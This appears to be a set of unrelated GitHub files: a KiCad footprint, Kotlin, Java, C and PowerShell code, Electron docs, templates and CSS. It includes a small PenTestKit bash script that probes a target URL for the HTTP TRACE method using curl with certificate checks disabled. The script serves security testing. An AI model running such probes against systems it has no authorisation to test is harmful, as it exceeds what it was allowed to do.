(fp_text reference REF** (at -0.635 -2.135) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value PinSocket_2x11_P1.27mm_Vertical (at -0.635 14.835) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.16 -0.635) (end 0.1275 -0.635) (layer F.Fab) (width 0.1))
(fp_line (start 0.1275 -0.635) (end 0.89 0.1275) (layer F.Fab) (width 0.1))
(fp_line (start 0.89 0.1275) (end 0.89 13.335) (layer F.Fab) (width 0.1))
(fp_line (start 0.89 13.335) (end -2.16 13.335) (layer F.Fab) (width 0.1))
(fp_line (start -2.16 13.335) (end -2.16 -0.635) (layer F.Fab) (width 0.1))
(fp_line (start -2.22 -0.695) (end -1.57753 -0.695) (layer F.SilkS) (width 0.12))
(fp_line (start -0.96247 -0.695) (end -0.76 -0.695) (layer F.SilkS) (width 0.12))
(fp_line (start -2.22 -0.695) (end -2.22 13.395) (layer F.SilkS) (width 0.12))
(fp_line (start 0.30753 13.395) (end 0.95 13.395) (layer F.SilkS) (width 0.12))
(fp_line (start -2.22 13.395) (end -1.57753 13.395) (layer F.SilkS) (width 0.12))
(fp_line (start -0.96247 13.395) (end -0.30753 13.395) (layer F.SilkS) (width 0.12))
(fp_line (start 0.95 0.635) (end 0.95 13.395) (layer F.SilkS) (width 0.12))
(fp_line (start 0.76 0.635) (end 0.95 0.635) (layer F.SilkS) (width 0.12))
(fp_line (start 0.95 -0.76) (end 0.95 0) (layer F.SilkS) (width 0.12))
(fp_line (start 0 -0.76) (end 0.95 -0.76) (layer F.SilkS) (width 0.12))
(fp_line (start -2.67 -1.15) (end 1.38 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.38 -1.15) (end 1.38 13.85) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.38 13.85) (end -2.67 13.85) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.67 13.85) (end -2.67 -1.15) (layer F.CrtYd) (width 0.05))
(pad 1 thru_hole rect (at 0 0) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 2 thru_hole oval (at -1.27 0) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 3 thru_hole oval (at 0 1.27) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 4 thru_hole oval (at -1.27 1.27) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 5 thru_hole oval (at 0 2.54) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 6 thru_hole oval (at -1.27 2.54) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 7 thru_hole oval (at 0 3.81) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 8 thru_hole oval (at -1.27 3.81) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 9 thru_hole oval (at 0 5.08) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 10 thru_hole oval (at -1.27 5.08) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 11 thru_hole oval (at 0 6.35) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 12 thru_hole oval (at -1.27 6.35) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 13 thru_hole oval (at 0 7.62) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 14 thru_hole oval (at -1.27 7.62) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 15 thru_hole oval (at 0 8.89) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 16 thru_hole oval (at -1.27 8.89) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 17 thru_hole oval (at 0 10.16) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 18 thru_hole oval (at -1.27 10.16) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 19 thru_hole oval (at 0 11.43) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 20 thru_hole oval (at -1.27 11.43) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 21 thru_hole oval (at 0 12.7) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(pad 22 thru_hole oval (at -1.27 12.7) (size 1 1) (drill 0.7) (layers *.Cu *.Mask))
(fp_text user %R (at -0.635 6.35 90) (layer F.Fab)
(effects (font (size 1 1) (thickness 0.15)))
)
(model ${KISYS3DMOD}/Connector_PinSocket_1.27mm.3dshapes/PinSocket_2x11_P1.27mm_Vertical.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
|
{
"pile_set_name": "Github"
}
|
/*
* This Source Code Form is subject to the terms of the Mozilla Public License,
* v. 2.0. If a copy of the MPL was not distributed with this file, You can
* obtain one at http://mozilla.org/MPL/2.0/. OpenMRS is also distributed under
* the terms of the Healthcare Disclaimer located at http://openmrs.org/license.
*
* Copyright (C) OpenMRS Inc. OpenMRS is a registered trademark and the OpenMRS
* graphic logo is a trademark of OpenMRS Inc.
*/
package org.openmrs.mobile.utilities
import android.content.Context
import androidx.appcompat.widget.AppCompatEditText
class RangeEditText(context: Context?) : AppCompatEditText(context!!) {
var upperlimit: Double? = null
var lowerlimit: Double? = null
var name: String? = null
}
|
{
"pile_set_name": "Github"
}
|
# shell
> Manage files and URLs using their default applications.
Process: [Main](../glossary.md#main-process), [Renderer](../glossary.md#renderer-process) (non-sandboxed only)
The `shell` module provides functions related to desktop integration.
An example of opening a URL in the user's default browser:
```javascript
const { shell } = require('electron')
shell.openExternal('https://github.com')
```
**Note:** While the `shell` module can be used in the renderer process, it will not function in a sandboxed renderer.
## Methods
The `shell` module has the following methods:
### `shell.showItemInFolder(fullPath)`
* `fullPath` String
Show the given file in a file manager. If possible, select the file.
### `shell.openPath(path)`
* `path` String
Returns `Promise<String>` - Resolves with a string containing the error message corresponding to the failure if a failure occurred, otherwise "".
Open the given file in the desktop's default manner.
### `shell.openExternal(url[, options])`
* `url` String - Max 2081 characters on windows.
* `options` Object (optional)
* `activate` Boolean (optional) _macOS_ - `true` to bring the opened application to the foreground. The default is `true`.
* `workingDirectory` String (optional) _Windows_ - The working directory.
Returns `Promise<void>`
Open the given external protocol URL in the desktop's default manner. (For example, mailto: URLs in the user's default mail agent).
### `shell.moveItemToTrash(fullPath[, deleteOnFail])`
* `fullPath` String
* `deleteOnFail` Boolean (optional) - Whether or not to unilaterally remove the item if the Trash is disabled or unsupported on the volume. _macOS_
Returns `Boolean` - Whether the item was successfully moved to the trash or otherwise deleted.
Move the given file to trash and returns a boolean status for the operation.
### `shell.beep()`
Play the beep sound.
### `shell.writeShortcutLink(shortcutPath[, operation], options)` _Windows_
* `shortcutPath` String
* `operation` String (optional) - Default is `create`, can be one of following:
* `create` - Creates a new shortcut, overwriting if necessary.
* `update` - Updates specified properties only on an existing shortcut.
* `replace` - Overwrites an existing shortcut, fails if the shortcut doesn't
exist.
* `options` [ShortcutDetails](structures/shortcut-details.md)
Returns `Boolean` - Whether the shortcut was created successfully.
Creates or updates a shortcut link at `shortcutPath`.
### `shell.readShortcutLink(shortcutPath)` _Windows_
* `shortcutPath` String
Returns [`ShortcutDetails`](structures/shortcut-details.md)
Resolves the shortcut link at `shortcutPath`.
An exception will be thrown when any error happens.
|
{
"pile_set_name": "Github"
}
|
{% for file in files %}
<script data-cfasync="false" type="text/javascript" src="js/{{ file.filename }}
{{- '.php' in file.filename ? get_common(file.params|merge({'v': version})) : '?v=' ~ version|url_encode }}"></script>
{% endfor %}
<script data-cfasync="false" type="text/javascript">
// <![CDATA[
{{ code|raw }}
{% if files is not empty %}
AJAX.scriptHandler
{% for file in files %}
.add('{{ file.filename|escape_js_string }}', {{ file.has_onload ? 1 : 0 }})
{% endfor %}
;
$(function() {
{% for file in files %}
{% if file.has_onload %}
AJAX.fireOnload('{{ file.filename|escape_js_string }}');
{% endif %}
{% endfor %}
});
{% endif %}
// ]]>
</script>
|
{
"pile_set_name": "Github"
}
|
/*
* *********************************************************************** *
* project: org.matsim.*
* *********************************************************************** *
* *
* copyright : (C) 2019 by the members listed in the COPYING, *
* LICENSE and WARRANTY file. *
* email : info at matsim dot org *
* *
* *********************************************************************** *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* See also COPYING, LICENSE and WARRANTY file *
* *
* *********************************************************************** *
*/
package org.matsim.contrib.dvrp.tracker;
import org.matsim.api.core.v01.network.Link;
import org.matsim.contrib.dvrp.fleet.DvrpVehicle;
/**
* @author Michal Maciejewski (michalm)
*/
public interface OnlineTrackerListener {
OnlineTrackerListener NO_LISTENER = (vehicle, link) -> {
};
/**
* Notifies that the next link was entered.
*
* @param vehicle
* @param nextLink
*/
void vehicleEnteredNextLink(DvrpVehicle vehicle, Link nextLink);
}
|
{
"pile_set_name": "Github"
}
|
def test_base_os(host):
assert host.system_info.distribution == 'centos'
assert host.system_info.release == '7'
|
{
"pile_set_name": "Github"
}
|
--source include/not_have_tlsv13.inc
--let $INCREMENT=1
--let $USE_SOCKET=
--let $ERROR_IF_CHANNEL_UNSECURE=ER_SECURE_TRANSPORT_REQUIRED
--let $NO_SSL_ACCESS_DENIED_ERROR=2510
--let $USER_AUTH_PLUGIN= 'mysql_native_password'
--source ../include/connection_ssl.inc
--let $USER_AUTH_PLUGIN= 'sha256_password'
--source ../include/connection_ssl.inc
--let $USER_AUTH_PLUGIN= 'caching_sha2_password'
--source ../include/connection_ssl.inc
|
{
"pile_set_name": "Github"
}
|
function Resolve-LabVMDiskPath {
<#
.SYNOPSIS
Resolves the specified VM name to it's target VHDX path.
#>
param (
## VM/node name.
[Parameter(Mandatory, ValueFromPipeline)]
[ValidateNotNullOrEmpty()]
[System.String] $Name,
[Parameter()]
[ValidateSet('VHD','VHDX')]
[System.String] $Generation = 'VHDX',
## Configuration environment name
[Parameter()]
[AllowNull()]
[System.String] $EnvironmentName,
## Return the parent/folder path
[Parameter()]
[System.Management.Automation.SwitchParameter] $Parent
)
process {
$hostDefaults = Get-ConfigurationData -Configuration Host;
$differencingVhdPath = $hostDefaults.DifferencingVhdPath;
if ((-not $hostDefaults.DisableVhdEnvironmentName) -and
(-not [System.String]::IsNullOrEmpty($EnvironmentName))) {
$differencingVhdPath = Join-Path -Path $differencingVhdPath -ChildPath $EnvironmentName;
}
if ($Parent) {
$vhdPath = $differencingVhdPath;
}
else {
$vhdName = '{0}.{1}' -f $Name, $Generation.ToLower();
$vhdPath = Join-Path -Path $differencingVhdPath -ChildPath $vhdName;
}
return $vhdPath;
} #end process
} #end function
|
{
"pile_set_name": "Github"
}
|
#!/bin/bash
# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.
# e.g. $1 == proxy (http://127.0.0.1:8080)
# e.g. $2 == target url
if [ $# -eq 1 ]; then
curl -i -I -X TRACE --insecure "$1"
else
echo "Please provide a target host."
fi
|
{
"pile_set_name": "Github"
}
|
<ng-template [ngIf]="mode === 'button'">
<div class="weui-pagination__item weui-pagination__prev">
<a weui-button (click)="_goto(-1)" [weui-mini]="mini" weui-type="default" [disabled]="_prevDisabled" [innerHTML]="prevText"></a>
</div>
<div class="weui-pagination__item weui-pagination__num" *ngIf="!simple">{{ current }}/{{ total }}</div>
<div class="weui-pagination__item weui-pagination__next">
<a weui-button (click)="_goto(1)" [weui-mini]="mini" weui-type="default" [disabled]="_nextDisabled" [innerHTML]="nextText"></a>
</div>
</ng-template>
<div class="weui-pagination__item weui-pagination__num" *ngIf="mode === 'pointer'">
<div *ngFor="let i of _ptArr" class="weui-pagination__dot" [class.weui-pagination__dot-active]="current === i">
<span></span>
</div>
</div>
|
{
"pile_set_name": "Github"
}
|
/* crypto/evp/bio_md.c */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
#include <stdio.h>
#include <errno.h>
#include "cryptlib.h"
#include <openssl/buffer.h>
#include <openssl/evp.h>
/*
* BIO_put and BIO_get both add to the digest, BIO_gets returns the digest
*/
static int md_write(BIO *h, char const *buf, int num);
static int md_read(BIO *h, char *buf, int size);
/*
* static int md_puts(BIO *h, const char *str);
*/
static int md_gets(BIO *h, char *str, int size);
static long md_ctrl(BIO *h, int cmd, long arg1, void *arg2);
static int md_new(BIO *h);
static int md_free(BIO *data);
static long md_callback_ctrl(BIO *h, int cmd, bio_info_cb *fp);
static BIO_METHOD methods_md = {
BIO_TYPE_MD, "message digest",
md_write,
md_read,
NULL, /* md_puts, */
md_gets,
md_ctrl,
md_new,
md_free,
md_callback_ctrl,
};
BIO_METHOD *BIO_f_md(void)
{
return (&methods_md);
}
static int md_new(BIO *bi)
{
EVP_MD_CTX *ctx;
ctx = EVP_MD_CTX_create();
if (ctx == NULL)
return (0);
bi->init = 0;
bi->ptr = (char *)ctx;
bi->flags = 0;
return (1);
}
static int md_free(BIO *a)
{
if (a == NULL)
return (0);
EVP_MD_CTX_destroy(a->ptr);
a->ptr = NULL;
a->init = 0;
a->flags = 0;
return (1);
}
static int md_read(BIO *b, char *out, int outl)
{
int ret = 0;
EVP_MD_CTX *ctx;
if (out == NULL)
return (0);
ctx = b->ptr;
if ((ctx == NULL) || (b->next_bio == NULL))
return (0);
ret = BIO_read(b->next_bio, out, outl);
if (b->init) {
if (ret > 0) {
if (EVP_DigestUpdate(ctx, (unsigned char *)out,
(unsigned int)ret) <= 0)
return (-1);
}
}
BIO_clear_retry_flags(b);
BIO_copy_next_retry(b);
return (ret);
}
static int md_write(BIO *b, const char *in, int inl)
{
int ret = 0;
EVP_MD_CTX *ctx;
if ((in == NULL) || (inl <= 0))
return (0);
ctx = b->ptr;
if ((ctx != NULL) && (b->next_bio != NULL))
ret = BIO_write(b->next_bio, in, inl);
if (b->init) {
if (ret > 0) {
if (!EVP_DigestUpdate(ctx, (const unsigned char *)in,
(unsigned int)ret)) {
BIO_clear_retry_flags(b);
return 0;
}
}
}
if (b->next_bio != NULL) {
BIO_clear_retry_flags(b);
BIO_copy_next_retry(b);
}
return (ret);
}
static long md_ctrl(BIO *b, int cmd, long num, void *ptr)
{
EVP_MD_CTX *ctx, *dctx, **pctx;
const EVP_MD **ppmd;
EVP_MD *md;
long ret = 1;
BIO *dbio;
ctx = b->ptr;
switch (cmd) {
case BIO_CTRL_RESET:
if (b->init)
ret = EVP_DigestInit_ex(ctx, ctx->digest, NULL);
else
ret = 0;
if (ret > 0)
ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
break;
case BIO_C_GET_MD:
if (b->init) {
ppmd = ptr;
*ppmd = ctx->digest;
} else
ret = 0;
break;
case BIO_C_GET_MD_CTX:
pctx = ptr;
*pctx = ctx;
b->init = 1;
break;
case BIO_C_SET_MD_CTX:
if (b->init)
b->ptr = ptr;
else
ret = 0;
break;
case BIO_C_DO_STATE_MACHINE:
BIO_clear_retry_flags(b);
ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
BIO_copy_next_retry(b);
break;
case BIO_C_SET_MD:
md = ptr;
ret = EVP_DigestInit_ex(ctx, md, NULL);
if (ret > 0)
b->init = 1;
break;
case BIO_CTRL_DUP:
dbio = ptr;
dctx = dbio->ptr;
if (!EVP_MD_CTX_copy_ex(dctx, ctx))
return 0;
b->init = 1;
break;
default:
ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
break;
}
return (ret);
}
static long md_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
{
long ret = 1;
if (b->next_bio == NULL)
return (0);
switch (cmd) {
default:
ret = BIO_callback_ctrl(b->next_bio, cmd, fp);
break;
}
return (ret);
}
static int md_gets(BIO *bp, char *buf, int size)
{
EVP_MD_CTX *ctx;
unsigned int ret;
ctx = bp->ptr;
if (size < ctx->digest->md_size)
return (0);
if (EVP_DigestFinal_ex(ctx, (unsigned char *)buf, &ret) <= 0)
return -1;
return ((int)ret);
}
/*-
static int md_puts(bp,str)
BIO *bp;
char *str;
{
return(-1);
}
*/
|
{
"pile_set_name": "Github"
}
|
tech data tecd sets three for two split tech data corp said its board declared a three for two stock split payable april to holders of record april reuter
|
{
"pile_set_name": "Github"
}
|
/*******************************************************************************
* Copyright (c) 2017 IBM Corporation and others.
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* which accompanies this distribution, and is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* Contributors:
* IBM Corporation - initial API and implementation
*******************************************************************************/
package defaultbeanvalidation.client.beans;
import java.util.Set;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.validation.ConstraintViolation;
import javax.validation.Validator;
import javax.validation.constraints.Max;
import javax.validation.constraints.Min;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Pattern;
import javax.validation.constraints.Size;
public class AValidationAnnTestBean {
/**
* Logging support and the static initializer for this class. Used to trace file
* version information. This will display the current version of the class in the
* debug log at the time the class is loaded.
*/
private static final String thisClass = AValidationAnnTestBean.class.getName();
private static Logger traceLogger = Logger.getLogger(thisClass);
static {
traceLogger.logp(Level.INFO, thisClass, "", "version : %I%");
}
// No dd for this bean so these are plain fields
String builder = "J and E Builder";
String address = "1625 19th St NE";
@Min(1)
int iMin = 1;
@Max(value = 1, message = "as an EL expresion, ${validatedValue} must be less than {value} but is " +
"${validatedValue > 5 ? 'greater than 5' : 'less than or equal to 5'}")
Integer iMax = 1;
@Size(min = 1)
int[] iMinArray = { 1 };
@Size(max = 1)
Integer[] iMaxArray = { 1 };
@Pattern(regexp = "[a-z][a-z]*", message = "go to your room! - {regexp}")
String pattern = "mypattern";
boolean setToFail = false;
Validator validator;
public AValidationAnnTestBean() throws Exception {
Context nContext = new InitialContext();
validator = (Validator) nContext.lookup("java:comp/Validator");
}
private void setValidationToFail() {
traceLogger.entering(thisClass, "setValidationToFail", this);
// Not specified in the dd so these should not have any effect
builder = null;
address = "BAD";
// This value will cause a validation failure
pattern = "12345";
setToFail = true;
traceLogger.exiting(thisClass, "setValidationToFail" + this);
}
private void resetValidation() {
traceLogger.entering(thisClass, "resetValidation", this);
builder = "J and E Builder";
address = "1625 19th St NE";
// Reset this field that currently should cause a validation error
pattern = "mypattern";
setToFail = false;
traceLogger.exiting(thisClass, "resetValidation" + this);
}
@NotNull
public String getDesc() {
return pattern;
}
public void checkInjectionValidation() {
traceLogger.entering(thisClass, "checkInjectionValidation", this);
resetValidation();
Set<ConstraintViolation<AValidationAnnTestBean>> cvSet = validator.validate(this);
if (!cvSet.isEmpty()) {
String msg = formatConstraintViolations(cvSet);
traceLogger.log(Level.INFO, "Some reason cvSet was not null: " + cvSet + ", " + msg);
throw new IllegalStateException("validation should not have found constraints: " + msg);
}
traceLogger.exiting(thisClass, "checkInjectionValidation ");
}
public void checkInjectionValidationFail() {
traceLogger.entering(thisClass, "checkInjectionValidationFail", this);
try {
setValidationToFail();
Set<ConstraintViolation<AValidationAnnTestBean>> cvSet = validator.validate(this);
if (!cvSet.isEmpty()) {
String msg = formatConstraintViolations(cvSet);
traceLogger.log(Level.INFO, thisClass, "validation failed contraint checking (expected): " + msg);
if (cvSet.size() != 1) {
throw new IllegalStateException("should have found 1 constraint violations but instead found "
+ cvSet.size() + ": " + msg);
}
// There will be only one
for (ConstraintViolation<AValidationAnnTestBean> constraint : cvSet) {
String template = constraint.getMessageTemplate();
String message = constraint.getMessage();
// make sure the template is the same as set in the annotation
if (!template.equals("go to your room! - {regexp}")) {
throw new IllegalStateException("incorrect message template: " + template);
}
// make sure the actual message is "default" interpolated
if (!message.equals("go to your room! - [a-z][a-z]*")) {
throw new IllegalStateException("incorrect message: " + message);
}
}
} else {
throw new IllegalStateException("this bean should have failed validation");
}
} finally {
resetValidation();
}
traceLogger.exiting(thisClass, "checkInjectionValidationFail ");
}
public void checkELValidationMessage(boolean elEnabled) {
try {
iMax = 5;
Set<ConstraintViolation<AValidationAnnTestBean>> cvSet = validator.validate(this);
if (!cvSet.isEmpty()) {
String msg = formatConstraintViolations(cvSet);
traceLogger.log(Level.INFO, thisClass, "validation failed contraint checking (expected): " + msg);
if (cvSet.size() != 1) {
throw new IllegalStateException("should have found 1 constraint violations but instead found "
+ cvSet.size() + ": " + msg);
}
// There will be only one
for (ConstraintViolation<AValidationAnnTestBean> constraint : cvSet) {
String template = constraint.getMessageTemplate();
String message = constraint.getMessage();
// make sure the template is the same as set in the annotation
if (!template.equals("as an EL expresion, ${validatedValue} must be less than " +
"{value} but is ${validatedValue > 5 ? 'greater than 5' : 'less than or equal to 5'}")) {
throw new IllegalStateException("incorrect message template: " + template);
}
if (elEnabled) {
// make sure the actual message has all parameters filled in and
// EL expressions evaluated
if (!message.equals("as an EL expresion, 5 must be less than " +
"1 but is less than or equal to 5")) {
throw new IllegalStateException("incorrect message when EL enabled: " + message);
}
} else {
// make sure the actual message has the normal non-EL parameters filled in
if (!message.equals("as an EL expresion, ${validatedValue} must be less than " +
"1 but is ${validatedValue > 5 ? 'greater than 5' : 'less than or equal to 5'}")) {
throw new IllegalStateException("incorrect message when EL disabled: " + message);
}
}
}
} else {
throw new IllegalStateException("this bean should have failed validation");
}
} finally {
iMax = 1;
}
}
@Override
public String toString() {
String result = "iMin:" + iMin + " iMax:" + iMax + " iMinArray:" + iMinArray + " iMaxArray:" + iMaxArray + " pattern:" + pattern
+ " builder:" + builder + " address:" + address + " setToFail:" + setToFail;
return result;
}
/**
* Convert the constraint violations for use within WAS diagnostic logs.
*
* @return a String representation of the constraint violations formatted one per line and uniformly indented.
*/
public String formatConstraintViolations(Set<ConstraintViolation<AValidationAnnTestBean>> cvSet) {
traceLogger.entering(thisClass, "formatConstraintViolations " + cvSet);
StringBuffer msg = new StringBuffer();
for (ConstraintViolation<AValidationAnnTestBean> cv : cvSet) {
msg.append("\n\t" + cv.toString());
}
traceLogger.exiting(thisClass, "formatConstraintViolations " + msg);
return msg.toString();
}
}
|
{
"pile_set_name": "Github"
}
|
/*
* Mesa 3-D graphics library
*
* Copyright (C) 2011 Morgan Armand <morgan.devel@gmail.com>
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
* OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
* ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
* OTHER DEALINGS IN THE SOFTWARE.
*/
#ifndef STW_EXT_CONTEXT_H
#define STW_EXT_CONTEXT_H
#include <windows.h>
#include <GL/gl.h>
typedef HGLRC (WINAPI *wglCreateContext_t)(HDC hdc);
typedef BOOL (WINAPI *wglDeleteContext_t)(HGLRC hglrc);
extern wglCreateContext_t wglCreateContext_func;
extern wglDeleteContext_t wglDeleteContext_func;
#endif /* STW_EXT_CONTEXT_H */
|
{
"pile_set_name": "Github"
}
|
/*!
* FullCalendar v2.2.0 Stylesheet
* Docs & License: http://arshaw.com/fullcalendar/
* (c) 2013 Adam Shaw
*/
.fc {
direction: ltr;
text-align: left;
}
.fc-rtl {
text-align: right;
}
body .fc { /* extra precedence to overcome jqui */
font-size: 1em;
}
/* Colors
--------------------------------------------------------------------------------------------------*/
.fc-unthemed th,
.fc-unthemed td,
.fc-unthemed hr,
.fc-unthemed thead,
.fc-unthemed tbody,
.fc-unthemed .fc-row,
.fc-unthemed .fc-popover {
border-color: #ddd;
}
.fc-unthemed .fc-popover {
background-color: #fff;
}
.fc-unthemed hr,
.fc-unthemed .fc-popover .fc-header {
background: #eee;
}
.fc-unthemed .fc-popover .fc-header .fc-close {
color: #666;
}
.fc-unthemed .fc-today {
background: #fcf8e3;
}
.fc-highlight { /* when user is selecting cells */
background: #bce8f1;
opacity: .3;
filter: alpha(opacity=30); /* for IE */
}
.fc-bgevent { /* default look for background events */
background: rgb(143, 223, 130);
opacity: .3;
filter: alpha(opacity=30); /* for IE */
}
.fc-nonbusiness { /* default look for non-business-hours areas */
/* will inherit .fc-bgevent's styles */
background: #ccc;
}
/* Icons (inline elements with styled text that mock arrow icons)
--------------------------------------------------------------------------------------------------*/
.fc-icon {
display: inline-block;
font-size: 2em;
line-height: .5em;
height: .5em; /* will make the total height 1em */
font-family: "Courier New", Courier, monospace;
}
.fc-icon-left-single-arrow:after {
content: "\02039";
font-weight: bold;
}
.fc-icon-right-single-arrow:after {
content: "\0203A";
font-weight: bold;
}
.fc-icon-left-double-arrow:after {
content: "\000AB";
}
.fc-icon-right-double-arrow:after {
content: "\000BB";
}
.fc-icon-x:after {
content: "\000D7";
}
/* Buttons (styled <button> tags, normalized to work cross-browser)
--------------------------------------------------------------------------------------------------*/
.fc button {
/* force height to include the border and padding */
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
/* dimensions */
margin: 0;
height: 2.1em;
padding: 0 .6em;
/* text & cursor */
font-size: 1em; /* normalize */
white-space: nowrap;
cursor: pointer;
}
/* Firefox has an annoying inner border */
.fc button::-moz-focus-inner { margin: 0; padding: 0; }
.fc-state-default { /* non-theme */
border: 1px solid;
}
.fc-state-default.fc-corner-left { /* non-theme */
border-top-left-radius: 4px;
border-bottom-left-radius: 4px;
}
.fc-state-default.fc-corner-right { /* non-theme */
border-top-right-radius: 4px;
border-bottom-right-radius: 4px;
}
/* icons in buttons */
.fc button .fc-icon { /* non-theme */
position: relative;
top: .05em; /* seems to be a good adjustment across browsers */
margin: 0 .1em;
}
/*
button states
borrowed from twitter bootstrap (http://twitter.github.com/bootstrap/)
*/
.fc-state-default {
background-color: #f5f5f5;
background-image: -moz-linear-gradient(top, #ffffff, #e6e6e6);
background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#ffffff), to(#e6e6e6));
background-image: -webkit-linear-gradient(top, #ffffff, #e6e6e6);
background-image: -o-linear-gradient(top, #ffffff, #e6e6e6);
background-image: linear-gradient(to bottom, #ffffff, #e6e6e6);
background-repeat: repeat-x;
border-color: #e6e6e6 #e6e6e6 #bfbfbf;
